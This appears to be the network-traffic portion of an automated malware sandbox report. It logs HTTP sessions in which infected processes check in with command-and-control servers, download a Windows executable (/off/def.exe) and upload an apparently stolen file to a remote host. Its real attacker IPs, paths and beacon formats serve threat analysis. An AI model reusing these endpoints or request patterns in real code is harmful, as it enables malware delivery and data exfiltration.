                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.183545113 CET2472OUTData Raw: f6 ce d0 8c 90 96 05 b4 03 48 fe 6b 8b 26 46 98 29 51 d0 a7 c7 85 82 d9 3e 56 e5 97 d1 c9 f4 dc 92 3e 19 31 9e ab 0b 53 ed 6c 21 88 90 2c 76 29 ba ca 20 4a 2a 87 41 3b 56 7f ac ab dd 3d dd b0 f8 82 be dd 73 d6 7e 2c 72 fe 1b ed 6c 66 9f cd 81 7c
                                                                                                                                                                                                                                                                                      Data Ascii: Hk&F)Q>V>1Sl!,v) J*A;V=s~,rlf|ak5`N.|pxlQL}+am_p<k%^:FDzTL/t9%;nA5h~]?Ijq5v8TyiN?1rM<=9{
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.183813095 CET4944OUTData Raw: b6 e9 11 d8 7d 5a 53 1d d3 f3 e5 04 f0 c7 2c bf 9a d8 5c b1 75 48 1a c5 8a 33 3a 77 3a d1 6b 5f cc fa 32 40 0e fc 95 5f 45 c8 87 33 8c 13 8c 60 c8 6c 81 cb 83 49 75 ad 43 0a 87 59 de fa 0f c3 bc 76 a4 d7 fe c3 cf 9d 43 29 6e 36 fa 80 04 c2 d6 50
                                                                                                                                                                                                                                                                                      Data Ascii: }ZS,\uH3:w:k_2@_E3`lIuCYvC)n6Pq!QjF('9P3a>z['CAs,7n)usaGvf%:Uc[eH;K2uB6:<#N;@b>}g~=Ges3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.183841944 CET4944OUTData Raw: 53 02 8e 0e 45 3e cd 8f 3f 3d 54 8a 5e fe f8 e5 6f 2e c7 b5 e6 c9 f1 65 51 e6 9d 88 d3 05 2d f6 28 00 1e 53 35 2b 57 cc a8 9c 8a fc 20 49 37 47 c6 39 07 6c b5 cd de d1 db af 17 ce dc f7 69 d4 50 35 5a e5 34 57 1c ad 61 2d 7d 62 f9 5f 4b 56 8f d9
                                                                                                                                                                                                                                                                                      Data Ascii: SE>?=T^o.eQ-(S5+W I7G9liP5Z4Wa-}b_KV"Y46ZhIRw$hs7mSzG=P!eA{D,S @"sB/-!W(lt<1)8=f*AAFkm?Owa0@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.183856010 CET2472OUTData Raw: be 79 e9 23 31 6b 63 59 dc 7c fb 70 2e f0 2e 18 f5 36 71 f1 72 42 d0 31 96 52 f6 e3 bf 7b d3 1e c2 c6 82 74 61 a7 74 c6 38 4e 27 bc 0e b2 80 27 b5 7c fd 9d 34 09 85 97 70 db 0b 24 5f d3 9f 44 2a 6f e2 dd bd bf 7e b1 3a 81 a7 c7 23 86 08 4d 5d 26
                                                                                                                                                                                                                                                                                      Data Ascii: y#1kcY|p..6qrB1R{tat8N''|4p$_D*o~:#M]&qC~NV"#tL_44=tNtx\6o!oFVGUy9G=auOow_ai}20-j6,\c "d+=/JHoX#+Q&E&}4xhd5~=S
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.184155941 CET4944OUTData Raw: 88 ed 28 35 41 f5 00 55 ed ce d3 27 84 83 9a 54 f8 fc d6 22 55 5a a3 0f 5c 89 84 fe c6 a2 be 09 10 77 01 cf b8 d8 eb 95 0f 71 bd 33 9c 77 a4 b5 ef e6 71 32 0c c3 7c f9 ec 69 c9 e8 d2 a5 53 d8 41 65 d2 5f 66 e2 6f 01 f1 8f 78 cf 7a 3e 5d d0 c0 60
                                                                                                                                                                                                                                                                                      Data Ascii: (5AU'T"UZ\wq3wq2|iSAe_foxz>]`Hm-8&MVn1`v1SYK=V(f}*$6FZE'n`Gzm:/s8MFvmKx3?`R}XOVTb%qaT0
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.184314966 CET2472OUTData Raw: d4 77 79 84 96 3c bd 13 28 50 02 76 05 81 53 59 9a 13 f4 5b bf ef 34 ec f0 cd 31 2a 7e 3b 0a aa f0 25 83 00 8d c9 61 e1 55 8b 15 71 07 74 9f 16 a1 2b 57 3c c1 da 5a 0b fa f8 21 d6 a5 2d 9a a9 47 12 68 cc a7 fe a7 ad f4 ea ff 0a 9f a8 bf d5 fc 4a
                                                                                                                                                                                                                                                                                      Data Ascii: wy<(PvSY[41*~;%aUqt+W<Z!-GhJ}IRS[UD-@JN5CF&p-.GSt-6cvli4M'`U](;~;QB;0/H!o@/SK:>A/6Q#&[QHlzpH>9+
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.192035913 CET2472OUTData Raw: 1c 65 39 fc 06 ee 24 23 1b bf 58 be 76 ff 01 f8 ec f0 c4 3a c0 99 b6 15 36 37 14 7c 3d 7b a9 a2 8d 6a ee 87 6b e1 5a 52 99 31 f5 ac be 03 55 0f 53 54 ae 75 f9 21 9a da 73 fa b9 32 02 dd 2b 1a 65 02 4c bb 43 68 f9 a2 a5 41 dd 5b 2c 23 5b ed 06 81
                                                                                                                                                                                                                                                                                      Data Ascii: e9$#Xv:67|={jkZR1USTu!s2+eLChA[,#[ERqVQ`NbmmlfbVYrw\r7JS]Kcx~0GW!T4lvwQK^Q5c36[~(_(,1Z[Ye!<sY:X~=K[>6S
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.192255974 CET2472OUTData Raw: e9 f9 c1 db 5e c9 2a e6 2c c9 8d 2b 15 76 c0 8c 6f b3 bb f6 2a 95 ad 6c 04 75 ff bd e0 e3 f0 81 1c aa da ba e5 7a 49 04 e8 28 d2 79 45 f8 7f d9 52 7d 8d a2 34 b4 2c e3 b9 c3 87 4e 8a b5 d4 1d f5 46 98 54 7e 62 16 8e 91 6b 51 fd bc dd aa 20 dc 5d
                                                                                                                                                                                                                                                                                      Data Ascii: ^*,+vo*luzI(yER}4,NFT~bkQ ]9hNh]8)Du8Am['0z9^DE4om$H^[*(r5?iYaW5zYToM\bW#c$w<SJ+D
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.192436934 CET4944OUTData Raw: 24 2c 97 fb 83 dc 88 90 1a 6c 17 f5 c0 ae 71 ad 01 3c 89 03 61 43 07 e6 c0 ab 59 14 ed f8 aa 97 f1 ef 44 76 f8 6d ed 86 b0 23 c5 51 a9 85 8b 15 f1 9e 41 c4 58 2c fb b9 1d d9 c7 a8 f6 6e a3 76 95 3c 1d 7f 4f 73 6e dd c1 1b 00 ee e9 69 00 b7 0d dd
                                                                                                                                                                                                                                                                                      Data Ascii: $,lq<aCYDvm#QAX,nv<OsniE&f^3XU:M+8n2F&6ta?{Jp]X6UNV8dQ71+w\=;bt9XH*u2}v
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:32.072985888 CET190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      date: Wed, 20 Nov 2024 09:55:31 GMT
                                                                                                                                                                                                                                                                                      content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                      content-length: 2
                                                                                                                                                                                                                                                                                      etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                                      Data Raw: 4f 4b
                                                                                                                                                                                                                                                                                      Data Ascii: OK


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      19192.168.2.650138185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:33.465141058 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 37 36 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                      Data Ascii: d1=1007638001&unit=246122658369
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:34.192337036 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      20192.168.2.650149185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.127218008 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.864249945 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      21192.168.2.650150185.215.113.16809052C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.147526026 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.847884893 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 2741248
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:40:15 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673dae7f-29d400"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ **`Ui` @ @.rsrc`2@.idata 8@yggyennp)r):@ceftresi *)@.taggant@@*")@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.847928047 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.848890066 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849139929 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849150896 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849157095 CET24INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849704027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849714994 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849720955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.849812031 CET24INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:36.853152037 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      22192.168.2.650154185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:38.644700050 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:39.169012070 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:39 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      23192.168.2.65015534.116.198.130806984C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:39.309025049 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: fvtekk5pn.top
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Content-Length: 35911
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------wixWPdqX0bfCJZwAdi93jd
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 77 69 78 57 50 64 71 58 30 62 66 43 4a 5a 77 41 64 69 39 33 6a 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 7a 69 7a 75 74 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 68 f8 e8 a2 8d c9 8d 32 bd 37 ad b1 22 67 a9 20 2e 07 a9 8a 5f 78 0c 94 29 2c 1e c3 3f e8 c8 3b 3c fe 04 56 91 d0 b5 53 bd 31 69 d4 4c cf 7d e6 9e 42 17 26 f9 98 17 f8 6f 17 98 eb 65 7a 8f 90 4d de e2 a2 8f 6e b0 27 3a 7a 68 d6 05 60 f8 a6 42 a2 9f a6 d4 f8 92 6a 64 18 cb 58 d8 eb 67 e2 12 7d 08 3f e5 c4 19 82 7c 13 3a 64 bc 17 e0 90 76 4f 39 2f f0 c8 c9 c9 81 65 5d 69 a4 c8 d9 f2 6a 91 c9 9c d1 cf a3 ae 57 61 a5 4a 96 bd c8 2c d6 0b 6e a0 8f 63 eb dc 55 8c 1b 08 ff 15 87 76 1a 31 5a 7f 55 7d 4e d9 7f 15 09 e9 bc 60 5b 93 22 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: --------------------------wixWPdqX0bfCJZwAdi93jdContent-Disposition: form-data; name="file"; filename="Zezizut.bin"Content-Type: application/octet-streamh27"g ._x),?;<VS1iL}B&oezMn':zh`BjdXg}?|:dvO9/e]ijWaJ,ncUv1ZU}N`["49td=ZQb\}Og0hC(lUQ]._F9s#'%zD)!5~r]e%EJ{R%E@tCM@wPuSYeiD}B%Ef]Azr2^8i2=ofy<ET,l2`3Zt@<)H)hFRfP6=mpleJs`lLQIHO`XoTh LqSDC=@bG FP[7@QaPY0<Rbc"AN&Y2P^CN4rj}s_(e0^WFf-CE|J>;uG~ZVPQ(#[)]4@*K1O5'"({}<[_P>f</aR;}m3LN/dOO7Zf5_ye/RfbRWN\I6$&a5VX,5LU99U8A}Ry>Tp [TRUNCATED]
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:39.316833973 CET2472OUTData Raw: df 11 1a a2 1b 54 98 82 d0 c3 fc c1 6e 3f 4e 3e 5e 35 b7 b9 e8 91 70 7f cf 77 44 b8 67 49 e8 57 cf 66 4c bd eb b6 2a 2e 9f a3 29 18 85 35 f6 9b 54 96 e6 f5 57 d1 c6 bc 41 b2 ce 22 99 c5 26 5e a3 22 ce 02 6d 5c f9 8e 65 f6 75 cd fd 66 3b a4 15 4b
                                                                                                                                                                                                                                                                                      Data Ascii: Tn?N>^5pwDgIWfL*.)5TWA"&^"m\euf;KU N fv4^` `x4y1(&)p\7Nw<t.3JCzPnP+YazD-T[,;/KiLW&K|!*)Xshu-
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:39.317049026 CET14832OUTData Raw: 50 b9 eb c9 5e 20 48 35 21 cd e0 ac 33 09 e1 6b a4 1d 54 84 20 ab 10 63 14 ad b3 74 ac c4 04 84 78 91 28 19 ea 2e c0 8a a5 e3 fe d2 5d 34 98 66 00 f2 39 bb 51 46 b7 1d 64 52 18 db 15 df 86 c3 f4 f1 a8 a0 8b 42 db 2a 50 bb c3 b9 41 1c 87 07 a7 46
                                                                                                                                                                                                                                                                                      Data Ascii: P^ H5!3kT ctx(.]4f9QFdRB*PAFT}"^En"le'x$8~W"sY1MzhR!k!my<gwK^+2mbYu=MXct6ITg$My`!rI/EL5M2xYo+|
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:39.317203999 CET6428OUTData Raw: 95 9c e2 e6 4f 98 4c 1d 3d c7 4d 56 a9 27 16 fa cd de 0b e0 0f 0e 7f d2 b6 8f 16 5c c8 5f bf a6 ee f8 17 0c 2b d2 62 a0 fb 51 c1 d8 40 98 7b 56 ce dc a4 39 1c 82 36 41 fe 1c f4 70 84 88 26 84 7c be af 21 8b be 93 1b 34 8e c4 7e 79 e1 9e 3a e1 bf
                                                                                                                                                                                                                                                                                      Data Ascii: OL=MV'\_+bQ@{V96Ap&|!4~y:%K+IF3[=)yC9%t`Zjns.ZrN()k>rD,2j"U1CT;B)vr5-ym-!oTHxGMR$U\:G
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:40.180155993 CET190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      date: Wed, 20 Nov 2024 09:55:40 GMT
                                                                                                                                                                                                                                                                                      content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                      content-length: 2
                                                                                                                                                                                                                                                                                      etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                                      Data Raw: 4f 4b
                                                                                                                                                                                                                                                                                      Data Ascii: OK


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      24192.168.2.650156185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:40.819555998 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.538309097 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:41 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      25192.168.2.65015834.107.221.82805552C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.410223007 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.893771887 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 17:35:22 GMT
                                                                                                                                                                                                                                                                                      Age: 58819
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
